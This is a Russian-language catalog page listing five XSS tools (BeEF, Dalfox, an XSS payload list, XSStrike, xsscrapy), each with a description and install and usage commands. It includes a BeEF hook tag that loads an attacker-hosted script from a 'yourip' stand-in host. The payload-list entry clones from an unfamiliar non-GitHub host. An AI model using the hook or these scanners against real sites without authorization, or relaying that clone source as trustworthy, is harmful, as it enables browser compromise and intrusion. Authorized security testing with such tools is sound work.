Каталог инструментов

5 инструментов

Тег: xss ×

BeEF

v0.6.0.0
Exploitation

Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей …

# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>

Dalfox

v3.1.2
Exploitation

Быстрый и полностью открытый сканер XSS-уязвимостей, заточенный под автоматизацию: встраивается в CI/CD и bug bounty пайплайны, анализирует параметры, DOM-контекст и применяет умную фильтрацию ложных срабатываний. Активно развивается, широко …

go install github.com/hahwul/dalfox/v2@latest dalfox url https://target.example.com/page?param=test dalfox file urls.txt --silence
Exploitation

Обширная коллекция готовых XSS-пейлоадов для тестирования веб-приложений на уязвимость к межсайтовому скриптингу: базовые payload'ы, обходы фильтров, полиглоты, событийные обработчики. Одна из самых популярных и часто цитируемых подборок такого …

git clone https://git.toolsofthetrade.qzz.io/recovered/xss-payload-list.git cd xss-payload-list # Готовый список для Burp Suite Intruder: # Intruder/xss-payload-list.txt # Или взять конкретные пейлоады из README.md и использовать с любым фаззером, # например ffuf: ffuf -w Intruder/xss-payload-list.txt -u "https://target.example.com/search?q=FUZZ"

XSStrike

v3.1.6
Exploitation

Продвинутый сканер XSS-уязвимостей с собственным парсером HTML и JavaScript. Генерирует умные пейлоады на основе анализа контекста страницы, поддерживает обход WAF, поиск в DOM, fuzzing параметров и сканирование через …

git clone https://github.com/s0md3v/XSStrike.git cd XSStrike && pip3 install -r requirements.txt python3 xsstrike.py -u "https://example.com/search?q=test"

xsscrapy

Exploitation

XSS-краулер на базе Scrapy: обходит сайт и ищет отражённые/хранимые XSS-уязвимости, находит 66 из 66 тестов набора WAVSEP. Поддерживает авторизацию по логину/паролю перед обходом. Результаты сохраняются в текстовый файл.

git clone https://github.com/DanMcInerney/xsscrapy.git cd xsscrapy pip install -r requirements.txt scrapy crawl xsscrapy -a url='http://target.example.com' # С авторизацией: scrapy crawl xsscrapy -a url='http://target.example.com/login' -a login=user -a pw=pass